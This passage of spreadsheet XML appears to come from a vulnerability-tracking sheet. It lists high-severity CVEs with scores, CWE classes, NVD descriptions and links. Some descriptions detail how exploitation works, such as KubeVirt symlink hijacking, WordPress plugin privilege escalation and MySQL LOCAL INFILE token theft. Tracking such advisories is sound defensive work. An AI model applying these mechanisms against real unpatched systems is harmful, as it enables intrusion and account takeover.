        <v>8.800000000000001</v>
      </c>
      <c r="D736" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E736" s="5" t="inlineStr"/>
      <c r="F736" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G736" s="5" t="inlineStr"/>
      <c r="H736" s="5" t="inlineStr"/>
      <c r="I736" s="5" t="inlineStr">
        <is>
          <t>2026-09-05</t>
        </is>
      </c>
      <c r="J736" s="5" t="inlineStr"/>
      <c r="K736" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="L736" s="5" t="inlineStr">
        <is>
          <t>The Nokri – Job Board WordPress Theme theme for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'nokri_account_member_permissions' function in all versions up to, and including, 1.6.4. This makes it possible for authenticated attackers, with Subscriber-level access and above, to add new Subscriber users with employer account member permissions, who in turn can escalate privileges by updating the email address of any user, including Administrator users.</t>
        </is>
      </c>
      <c r="M736" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2025-9049</t>
        </is>
      </c>
    </row>
    <row r="737">
      <c r="A737" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B737" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-12648</t>
        </is>
      </c>
      <c r="C737" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D737" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E737" s="5" t="inlineStr"/>
      <c r="F737" s="5" t="n">
        <v>0.015</v>
      </c>
      <c r="G737" s="5" t="inlineStr"/>
      <c r="H737" s="5" t="inlineStr"/>
      <c r="I737" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J737" s="5" t="inlineStr"/>
      <c r="K737" s="5" t="inlineStr">
        <is>
          <t>CWE-502</t>
        </is>
      </c>
      <c r="L737" s="5" t="inlineStr">
        <is>
          <t>A Deserialization of Untrusted Data vulnerability in Ivanti Neurons for ITSM before 2026.2 allows a remote authenticated attacker to execute arbitrary code on the server.</t>
        </is>
      </c>
      <c r="M737" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-12648</t>
        </is>
      </c>
    </row>
    <row r="738">
      <c r="A738" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B738" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-12651</t>
        </is>
      </c>
      <c r="C738" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D738" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E738" s="5" t="inlineStr"/>
      <c r="F738" s="5" t="n">
        <v>0.015</v>
      </c>
      <c r="G738" s="5" t="inlineStr"/>
      <c r="H738" s="5" t="inlineStr"/>
      <c r="I738" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J738" s="5" t="inlineStr"/>
      <c r="K738" s="5" t="inlineStr">
        <is>
          <t>CWE-502</t>
        </is>
      </c>
      <c r="L738" s="5" t="inlineStr">
        <is>
          <t>A Deserialization of Untrusted Data vulnerability in Ivanti Neurons for ITSM before 2026.2 allows a remote authenticated attacker to execute arbitrary code on the server.</t>
        </is>
      </c>
      <c r="M738" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-12651</t>
        </is>
      </c>
    </row>
    <row r="739">
      <c r="A739" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B739" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-13622</t>
        </is>
      </c>
      <c r="C739" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D739" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E739" s="5" t="inlineStr"/>
      <c r="F739" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G739" s="5" t="inlineStr"/>
      <c r="H739" s="5" t="inlineStr"/>
      <c r="I739" s="5" t="inlineStr">
        <is>
          <t>2026-08-12</t>
        </is>
      </c>
      <c r="J739" s="5" t="inlineStr"/>
      <c r="K739" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="L739" s="5" t="inlineStr">
        <is>
          <t>A symlink following vulnerability was found in KubeVirt's virt-handler migration proxy. During live migration, virt-handler dials Unix sockets inside the target virt-launcher pod via /proc/&lt;pid&gt;/root/ paths using net.Dial() without symlink protection. These socket paths reside in qemu-owned directories writable by the virt-launcher user. An attacker with namespace edit and pods/exec permissions can replace a migration proxy socket with a symlink to the host CRI-O socket. Because virt-handler runs as root in the host mount namespace, absolute symlink targets resolve against the host filesystem, and the bidirectional io.Copy proxy relays attacker-controlled bytes to the container runtime, enabling full node compromise.</t>
        </is>
      </c>
      <c r="M739" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-13622</t>
        </is>
      </c>
    </row>
    <row r="740">
      <c r="A740" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B740" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-13739</t>
        </is>
      </c>
      <c r="C740" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D740" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E740" s="5" t="inlineStr"/>
      <c r="F740" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G740" s="5" t="inlineStr"/>
      <c r="H740" s="5" t="inlineStr">
        <is>
          <t>commvault:commvault</t>
        </is>
      </c>
      <c r="I740" s="5" t="inlineStr">
        <is>
          <t>2026-08-11</t>
        </is>
      </c>
      <c r="J740" s="5" t="inlineStr"/>
      <c r="K740" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="L740" s="5" t="inlineStr">
        <is>
          <t>A legacy endpoint in Command Center contained an unauthenticated server-side request forgery (SSRF) vulnerability related to the handling of arbitrary target URLs.  Software customers upgrade to resolved maintenance release.  Update Command Center.</t>
        </is>
      </c>
      <c r="M740" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-13739</t>
        </is>
      </c>
    </row>
    <row r="741">
      <c r="A741" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B741" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-13761</t>
        </is>
      </c>
      <c r="C741" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D741" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E741" s="5" t="inlineStr"/>
      <c r="F741" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G741" s="5" t="inlineStr"/>
      <c r="H741" s="5" t="inlineStr"/>
      <c r="I741" s="5" t="inlineStr">
        <is>
          <t>2026-08-28</t>
        </is>
      </c>
      <c r="J741" s="5" t="inlineStr"/>
      <c r="K741" s="5" t="inlineStr">
        <is>
          <t>CWE-606</t>
        </is>
      </c>
      <c r="L741" s="5" t="inlineStr">
        <is>
          <t>Pega Platform versions 7.1.0 through 25.1.2 are affected by an improper validation of inputs that are used for loop conditions, potentially leading to a denial of service or other consequences because of excessive looping.</t>
        </is>
      </c>
      <c r="M741" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-13761</t>
        </is>
      </c>
    </row>
    <row r="742">
      <c r="A742" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B742" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-14359</t>
        </is>
      </c>
      <c r="C742" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D742" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E742" s="5" t="inlineStr"/>
      <c r="F742" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G742" s="5" t="inlineStr"/>
      <c r="H742" s="5" t="inlineStr"/>
      <c r="I742" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J742" s="5" t="inlineStr"/>
      <c r="K742" s="5" t="inlineStr">
        <is>
          <t>CWE-269</t>
        </is>
      </c>
      <c r="L742" s="5" t="inlineStr">
        <is>
          <t>The YITH WooCommerce Waitlist Premium plugin for WordPress is vulnerable to Privilege Escalation in versions up to, and including, 3.35.0. This is due to the add_user_in_waiting_list() function registered on the wp_ajax_yith_wcwtl_add_user action being missing both a capability check and a nonce verification, and using parse_str() + extract() to import attacker-controlled variables from $_POST['params'] that are then passed to wp_create_user() and $user-&gt;set_role(). This makes it possible for authenticated attackers, with Subscriber-level access and above, to elevate their privileges to that of an administrator by creating a new user account and assigning it the administrator role.</t>
        </is>
      </c>
      <c r="M742" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-14359</t>
        </is>
      </c>
    </row>
    <row r="743">
      <c r="A743" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B743" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-14828</t>
        </is>
      </c>
      <c r="C743" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D743" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E743" s="5" t="inlineStr"/>
      <c r="F743" s="5" t="n">
        <v>0.014</v>
      </c>
      <c r="G743" s="5" t="inlineStr"/>
      <c r="H743" s="5" t="inlineStr"/>
      <c r="I743" s="5" t="inlineStr">
        <is>
          <t>2026-09-02</t>
        </is>
      </c>
      <c r="J743" s="5" t="inlineStr"/>
      <c r="K743" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="L743" s="5" t="inlineStr">
        <is>
          <t>Zohocorp ManageEngine Password Manager Pro versions before 13235, PAM360 versions before 8561, and Access Manager Plus versions before 4405 are vulnerable to an authenticated SQL Injection vulnerability.</t>
        </is>
      </c>
      <c r="M743" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-14828</t>
        </is>
      </c>
    </row>
    <row r="744">
      <c r="A744" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B744" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-16101</t>
        </is>
      </c>
      <c r="C744" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D744" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E744" s="5" t="inlineStr"/>
      <c r="F744" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G744" s="5" t="inlineStr"/>
      <c r="H744" s="5" t="inlineStr"/>
      <c r="I744" s="5" t="inlineStr">
        <is>
          <t>2026-08-13</t>
        </is>
      </c>
      <c r="J744" s="5" t="inlineStr"/>
      <c r="K744" s="5" t="inlineStr">
        <is>
          <t>CWE-290</t>
        </is>
      </c>
      <c r="L744" s="5" t="inlineStr">
        <is>
          <t>Spoofing an already bonded device can force either RS9116W or SiWx917 to re-pair/bond with a rogue device. See V1 in BLERP paper below</t>
        </is>
      </c>
      <c r="M744" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-16101</t>
        </is>
      </c>
    </row>
    <row r="745">
      <c r="A745" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B745" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-16502</t>
        </is>
      </c>
      <c r="C745" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D745" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E745" s="5" t="inlineStr"/>
      <c r="F745" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G745" s="5" t="inlineStr"/>
      <c r="H745" s="5" t="inlineStr"/>
      <c r="I745" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J745" s="5" t="inlineStr"/>
      <c r="K745" s="5" t="inlineStr">
        <is>
          <t>CWE-502</t>
        </is>
      </c>
      <c r="L745" s="5" t="inlineStr">
        <is>
          <t>The Live Composer – Free WordPress Website Builder plugin for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 2.1.18 via deserialization of untrusted input . This makes it possible for authenticated attackers, with contributor-level access and above, to inject a PHP Object. No known POP chain is present in the vulnerable software, which means this vulnerability has no impact unless another plugin or theme containing a POP chain is installed on the site. If a POP chain is present via an additional plugin or theme installed on the target system, it may allow the attacker to perform actions like delete arbitrary files, retrieve sensitive data, or execute code depending on the POP chain present.</t>
        </is>
      </c>
      <c r="M745" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-16502</t>
        </is>
      </c>
    </row>
    <row r="746">
      <c r="A746" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B746" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-16745</t>
        </is>
      </c>
      <c r="C746" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D746" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E746" s="5" t="inlineStr"/>
      <c r="F746" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G746" s="5" t="inlineStr">
        <is>
          <t>red hat, kubernetes</t>
        </is>
      </c>
      <c r="H746" s="5" t="inlineStr"/>
      <c r="I746" s="5" t="inlineStr">
        <is>
          <t>2026-07-23</t>
        </is>
      </c>
      <c r="J746" s="5" t="inlineStr"/>
      <c r="K746" s="5" t="inlineStr">
        <is>
          <t>CWE-346</t>
        </is>
      </c>
      <c r="L746" s="5" t="inlineStr">
        <is>
          <t>A flaw was found in odh-dashboard, the web console component of Red Hat OpenShift AI (RHOAI). Due to incorrect network binding, a malicious actor within the cluster can bypass authentication and impersonate any user by providing an arbitrary access token. This allows an attacker to gain unauthorized access to the Kubernetes API, potentially leading to arbitrary code execution, privilege escalation, or information disclosure.</t>
        </is>
      </c>
      <c r="M746" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-16745</t>
        </is>
      </c>
    </row>
    <row r="747">
      <c r="A747" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B747" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-1784</t>
        </is>
      </c>
      <c r="C747" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D747" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E747" s="5" t="inlineStr"/>
      <c r="F747" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G747" s="5" t="inlineStr"/>
      <c r="H747" s="5" t="inlineStr">
        <is>
          <t>redhat:openshift_container_platform</t>
        </is>
      </c>
      <c r="I747" s="5" t="inlineStr">
        <is>
          <t>2026-06-02</t>
        </is>
      </c>
      <c r="J747" s="5" t="inlineStr"/>
      <c r="K747" s="5" t="inlineStr">
        <is>
          <t>CWE-15</t>
        </is>
      </c>
      <c r="L747" s="5" t="inlineStr">
        <is>
          <t>The Route OpenShift resource allows to define routes to make pods reachable at a subdomain through HAProxy. It was found that the checks performed on the spec.path YAML stanza in a Route document was insufficient and could allow a controlled injection of the HAProxy configuration.</t>
        </is>
      </c>
      <c r="M747" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-1784</t>
        </is>
      </c>
    </row>
    <row r="748">
      <c r="A748" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B748" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-18198</t>
        </is>
      </c>
      <c r="C748" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D748" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E748" s="5" t="inlineStr"/>
      <c r="F748" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G748" s="5" t="inlineStr"/>
      <c r="H748" s="5" t="inlineStr"/>
      <c r="I748" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J748" s="5" t="inlineStr"/>
      <c r="K748" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="L748" s="5" t="inlineStr">
        <is>
          <t>Improper neutralization of special elements used in an SQL command ('SQL injection') vulnerability in TAC Information Services Internal and External Trade Inc. GOLDENHORN ONEIT allows Blind SQL Injection.
This issue affects GOLDENHORN ONEIT: before Göbeklitepe.</t>
        </is>
      </c>
      <c r="M748" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-18198</t>
        </is>
      </c>
    </row>
    <row r="749">
      <c r="A749" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B749" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-18341</t>
        </is>
      </c>
      <c r="C749" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D749" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E749" s="5" t="inlineStr"/>
      <c r="F749" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G749" s="5" t="inlineStr">
        <is>
          <t>ibm</t>
        </is>
      </c>
      <c r="H749" s="5" t="inlineStr">
        <is>
          <t>ibm:i</t>
        </is>
      </c>
      <c r="I749" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J749" s="5" t="inlineStr"/>
      <c r="K749" s="5" t="inlineStr">
        <is>
          <t>CWE-122, CWE-191</t>
        </is>
      </c>
      <c r="L749" s="5" t="inlineStr">
        <is>
          <t>IBM i 7.6, 7.5, 7.4, and 7.3 could allow a remote authenticated attacker to corrupt memory due to an integer underflow.</t>
        </is>
      </c>
      <c r="M749" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-18341</t>
        </is>
      </c>
    </row>
    <row r="750">
      <c r="A750" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B750" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-18480</t>
        </is>
      </c>
      <c r="C750" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D750" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E750" s="5" t="inlineStr"/>
      <c r="F750" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G750" s="5" t="inlineStr"/>
      <c r="H750" s="5" t="inlineStr"/>
      <c r="I750" s="5" t="inlineStr">
        <is>
          <t>2026-09-06</t>
        </is>
      </c>
      <c r="J750" s="5" t="inlineStr"/>
      <c r="K750" s="5" t="inlineStr">
        <is>
          <t>CWE-269</t>
        </is>
      </c>
      <c r="L750" s="5" t="inlineStr">
        <is>
          <t>The SureCart  WordPress plugin before 4.6.3 does not ensure that the account affected by a customer update is the same account its permission check authorised, allowing users with a subscriber-level account to change another user's email address, including an administrator's, and take over that account via a password reset. It further allows an attacker-controlled customer record to be associated with an arbitrary user, and discloses customer identifiers and email addresses to any authenticated user, which together make the takeover reachable from a subscriber-level account alone.</t>
        </is>
      </c>
      <c r="M750" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-18480</t>
        </is>
      </c>
    </row>
    <row r="751">
      <c r="A751" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B751" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-18486</t>
        </is>
      </c>
      <c r="C751" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D751" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E751" s="5" t="inlineStr"/>
      <c r="F751" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G751" s="5" t="inlineStr">
        <is>
          <t>ibm</t>
        </is>
      </c>
      <c r="H751" s="5" t="inlineStr"/>
      <c r="I751" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J751" s="5" t="inlineStr"/>
      <c r="K751" s="5" t="inlineStr">
        <is>
          <t>CWE-200</t>
        </is>
      </c>
      <c r="L751" s="5" t="inlineStr">
        <is>
          <t>IBM ContextForge MCP Gateway &lt;= v1.0.7 MCP Context Forge could allow a remote authenticated attacker to obtain sensitive credentials and escalate privileges due to improper validation of jq filters.</t>
        </is>
      </c>
      <c r="M751" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-18486</t>
        </is>
      </c>
    </row>
    <row r="752">
      <c r="A752" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B752" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-18617</t>
        </is>
      </c>
      <c r="C752" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D752" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E752" s="5" t="inlineStr"/>
      <c r="F752" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G752" s="5" t="inlineStr">
        <is>
          <t>mysql</t>
        </is>
      </c>
      <c r="H752" s="5" t="inlineStr"/>
      <c r="I752" s="5" t="inlineStr">
        <is>
          <t>2026-08-10</t>
        </is>
      </c>
      <c r="J752" s="5" t="inlineStr"/>
      <c r="K752" s="5" t="inlineStr">
        <is>
          <t>CWE-915</t>
        </is>
      </c>
      <c r="L752" s="5" t="inlineStr">
        <is>
          <t>A flaw was found in the Data Science Pipelines Operator (DSPO). A namespace editor can exploit a vulnerability in the spec.database.customExtraParams field, which allows for the injection of dangerous parameters into the MySQL Data Source Name (DSN) string. By manipulating these parameters, an attacker can enable LOCAL INFILE functionality and exfiltrate sensitive files, such as the service account token, from the operator pod. This can lead to privilege escalation, allowing a namespace editor to gain cluster-admin privileges.</t>
        </is>
      </c>
      <c r="M752" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-18617</t>
        </is>
      </c>
    </row>
    <row r="753">
      <c r="A753" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B753" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-18851</t>
        </is>
      </c>
      <c r="C753" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D753" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E753" s="5" t="inlineStr"/>
      <c r="F753" s="5" t="n">
        <v>0.01</v>
      </c>
      <c r="G753" s="5" t="inlineStr"/>
      <c r="H753" s="5" t="inlineStr">
        <is>
          <t>ivanti:endpoint_manager_mobile</t>
        </is>
      </c>
      <c r="I753" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J753" s="5" t="inlineStr"/>
      <c r="K753" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="L753" s="5" t="inlineStr">
        <is>
          <t>Missing authorization in Ivanti Endpoint Manager Mobile before version 12.10.0.0, 12.9.0.2, and 12.8.0.4 allows a remote authenticated attacker to escalate their privileges to admin.</t>
        </is>
      </c>
      <c r="M753" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-18851</t>
        </is>
      </c>
    </row>
    <row r="754">
      <c r="A754" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B754" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-19291</t>
        </is>
      </c>
      <c r="C754" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D754" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E754" s="5" t="inlineStr"/>
      <c r="F754" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G754" s="5" t="inlineStr"/>
      <c r="H754" s="5" t="inlineStr"/>
      <c r="I754" s="5" t="inlineStr">
        <is>
          <t>2026-08-13</t>
        </is>
      </c>
      <c r="J754" s="5" t="inlineStr"/>
      <c r="K754" s="5" t="inlineStr">
        <is>
          <t>CWE-290</t>
        </is>
      </c>
      <c r="L754" s="5" t="inlineStr">
        <is>
          <t>Bluetooth re-pairing with an existing device can use a lower security level. RS9116W and SiWx91x impacted. See V3 in the BLERP paper linked below.</t>
        </is>
      </c>
      <c r="M754" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-19291</t>
        </is>
      </c>
    </row>
    <row r="755">
      <c r="A755" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B755" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-19292</t>
        </is>
      </c>
      <c r="C755" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D755" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E755" s="5" t="inlineStr"/>
      <c r="F755" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G755" s="5" t="inlineStr"/>
      <c r="H755" s="5" t="inlineStr"/>
      <c r="I755" s="5" t="inlineStr">
        <is>
          <t>2026-08-13</t>
        </is>
      </c>
      <c r="J755" s="5" t="inlineStr"/>
      <c r="K755" s="5" t="inlineStr">
        <is>
          <t>CWE-305</t>
        </is>
      </c>
      <c r="L755" s="5" t="inlineStr">
        <is>
          <t>Re-pairing with a legitimate device can use a lower security level than
previous making brute-forcing the LTK easier. See V4 in the BLERP paper linked below.</t>
        </is>
      </c>
      <c r="M755" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-19292</t>
        </is>
      </c>
    </row>
    <row r="756">
      <c r="A756" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B756" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-19293</t>
        </is>
      </c>
      <c r="C756" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D756" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E756" s="5" t="inlineStr"/>
      <c r="F756" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G756" s="5" t="inlineStr"/>
      <c r="H756" s="5" t="inlineStr"/>
      <c r="I756" s="5" t="inlineStr">
        <is>
          <t>2026-08-13</t>
        </is>
      </c>
      <c r="J756" s="5" t="inlineStr"/>
      <c r="K756" s="5" t="inlineStr">
        <is>
          <t>CWE-521</t>
        </is>
      </c>
      <c r="L756" s="5" t="inlineStr">
        <is>
          <t>SMP security request (from peripheral) does not include the maximum
encryption key size supported. Using a key with less than the maximum keysize
makes brute-forcing the key easier. See V6 in BLERP paper linked below.</t>
        </is>
      </c>
      <c r="M756" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-19293</t>
        </is>
      </c>
    </row>
    <row r="757">
      <c r="A757" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B757" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-19298</t>
        </is>
      </c>
      <c r="C757" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D757" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E757" s="5" t="inlineStr"/>
      <c r="F757" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G757" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows, ibm</t>
        </is>
      </c>
      <c r="H757" s="5" t="inlineStr">
        <is>
          <t>apple:macos, langflow:langflow, linux:linux_kernel, microsoft:windows</t>
        </is>
      </c>
      <c r="I757" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J757" s="5" t="inlineStr"/>
      <c r="K757" s="5" t="inlineStr">
        <is>
          <t>CWE-94</t>
        </is>
      </c>
      <c r="L757" s="5" t="inlineStr">
        <is>
          <t>IBM Langflow OSS 1.0.0 through 1.11.2 could allow a remote authenticated attacker to execute arbitrary code due to an authorization bypass in the flow build process.</t>
        </is>
      </c>
      <c r="M757" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-19298</t>
        </is>
      </c>
    </row>
    <row r="758">
      <c r="A758" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B758" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-19546</t>
        </is>
      </c>
      <c r="C758" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D758" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E758" s="5" t="inlineStr"/>
      <c r="F758" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G758" s="5" t="inlineStr"/>
      <c r="H758" s="5" t="inlineStr"/>
      <c r="I758" s="5" t="inlineStr">
        <is>
          <t>2026-08-11</t>
        </is>
      </c>
      <c r="J758" s="5" t="inlineStr"/>
      <c r="K758" s="5" t="inlineStr">
        <is>
          <t>CWE-94</t>
        </is>
      </c>
      <c r="L758" s="5" t="inlineStr">
        <is>
